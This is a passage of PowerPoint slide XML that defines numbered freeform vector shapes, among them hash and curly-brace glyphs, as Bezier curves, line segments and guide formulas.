                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="100" y="40"/>
                      <a:pt x="99"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Freeform 157"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2672" y="407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Freeform 158"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2684" y="4073"/>
                <a:ext cx="5" cy="2"/>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Freeform 159"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2043"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Freeform 160"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 161"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2342" y="2562"/>
                <a:ext cx="82"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Freeform 162"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="249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Freeform 163"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2687"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Freeform 164"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2837"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8" name="Freeform 165"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="298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Freeform 166"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3182"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Freeform 167"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3332"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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="14"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Freeform 168"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="371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Freeform 169"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3905"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Freeform 170"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="410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2" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="38" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="55"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Freeform 171"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4285" y="2567"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 68 h 219"/>
                  <a:gd name="T2" fmla="*/ 184 w 189"/>
                  <a:gd name="T3" fmla="*/ 86 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 86 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 189"/>
                  <a:gd name="T7" fmla="*/ 136 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 136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3 w 189"/>
                  <a:gd name="T31" fmla="*/ 136 h 219"/>
                  <a:gd name="T32" fmla="*/ 48 w 189"/>
                  <a:gd name="T33" fmla="*/ 136 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 189"/>
                  <a:gd name="T35" fmla="*/ 86 h 219"/>
                  <a:gd name="T36" fmla="*/ 11 w 189"/>
                  <a:gd name="T37" fmla="*/ 86 h 219"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 68 h 219"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 68 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 82 w 189"/>
                  <a:gd name="T47" fmla="*/ 68 h 219"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 68 h 219"/>
                  <a:gd name="T50" fmla="*/ 138 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 68 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 68 h 219"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 86 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 189"/>
                  <a:gd name="T61" fmla="*/ 86 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 189"/>
                  <a:gd name="T63" fmla="*/ 136 h 219"/>
                  <a:gd name="T64" fmla="*/ 110 w 189"/>
                  <a:gd name="T65" fmla="*/ 136 h 219"/>
                  <a:gd name="T66" fmla="*/ 121 w 189"/>
                  <a:gd name="T67" fmla="*/ 8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8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="68"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="86"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121"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Freeform 172"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4502"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Freeform 173"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="469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Freeform 174"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4894"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Freeform 175"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5043" y="256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Freeform 176"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5241" y="2562"/>
                <a:ext cx="82"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Freeform 177"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5389"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Freeform 178"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5539"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2" name="Freeform 179"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5687"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Freeform 180"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877" y="2567"/>
                <a:ext cx="78" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 64"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 22 w 64"/>
                  <a:gd name="T3" fmla="*/ 198 h 241"/>
                  <a:gd name="T4" fmla="*/ 22 w 64"/>
                  <a:gd name="T5" fmla="*/ 157 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T7" fmla="*/ 128 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 64"/>
                  <a:gd name="T9" fmla="*/ 113 h 241"/>
                  <a:gd name="T10" fmla="*/ 22 w 64"/>
                  <a:gd name="T11" fmla="*/ 83 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 43 h 241"/>
                  <a:gd name="T14" fmla="*/ 64 w 64"/>
                  <a:gd name="T15" fmla="*/ 0 h 241"/>
                  <a:gd name="T16" fmla="*/ 64 w 64"/>
                  <a:gd name="T17" fmla="*/ 18 h 241"/>
                  <a:gd name="T18" fmla="*/ 42 w 64"/>
                  <a:gd name="T19" fmla="*/ 45 h 241"/>
                  <a:gd name="T20" fmla="*/ 42 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 64"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 64"/>
                  <a:gd name="T25" fmla="*/ 121 h 241"/>
                  <a:gd name="T26" fmla="*/ 42 w 64"/>
                  <a:gd name="T27" fmla="*/ 156 h 241"/>
                  <a:gd name="T28" fmla="*/ 42 w 64"/>
                  <a:gd name="T29" fmla="*/ 195 h 241"/>
                  <a:gd name="T30" fmla="*/ 47 w 64"/>
                  <a:gd name="T31" fmla="*/ 217 h 241"/>
                  <a:gd name="T32" fmla="*/ 64 w 64"/>
                  <a:gd name="T33" fmla="*/ 224 h 241"/>
                  <a:gd name="T34" fmla="*/ 64 w 64"/>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241"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="241"/>
                      <a:pt x="22" y="226"/>
                      <a:pt x="22" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="139"/>
                      <a:pt x="14" y="129"/>
                      <a:pt x="0" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="112"/>
                      <a:pt x="22" y="102"/>
                      <a:pt x="22" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="43"/>
                      <a:pt x="22" y="43"/>
                      <a:pt x="22" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="15"/>
                      <a:pt x="36" y="1"/>
                      <a:pt x="64" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="18"/>
                      <a:pt x="64" y="18"/>
                      <a:pt x="64"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3"/>
                      <a:pt x="47" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="221"/>
                      <a:pt x="55" y="223"/>
                      <a:pt x="64" y="224"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="64"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Freeform 181"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5985" y="2567"/>
                <a:ext cx="77" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 241"/>
                  <a:gd name="T2" fmla="*/ 41 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 241"/>
                  <a:gd name="T4" fmla="*/ 41 w 63"/>
                  <a:gd name="T5" fmla="*/ 198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1" y="139"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="241"/>
                      <a:pt x="0" y="241"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="223"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>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9" y="112"/>
                      <a:pt x="63" y="113"/>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Freeform 182"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6092"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Freeform 183"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6240"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Freeform 184"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="643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Freeform 185"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6634"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Freeform 186"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6781"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Freeform 187"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6978"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Freeform 188"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="712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Freeform 189"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7325"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Freeform 190"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7473" y="2564"/>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Freeform 191"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7671"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Freeform 192"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3461" y="255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2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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="179"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="207"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="134" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="196"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>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79"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>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8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="99"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="64"/>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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="122" y="29"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="122" y="43"/>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3" y="160"/>
                      <a:pt x="139" y="160"/>
                      <a:pt x="135" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="149"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="149"/>
                      <a:pt x="121" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="188"/>
                      <a:pt x="121" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="144" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="191"/>
                      <a:pt x="158" y="188"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="174" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="172" y="174"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
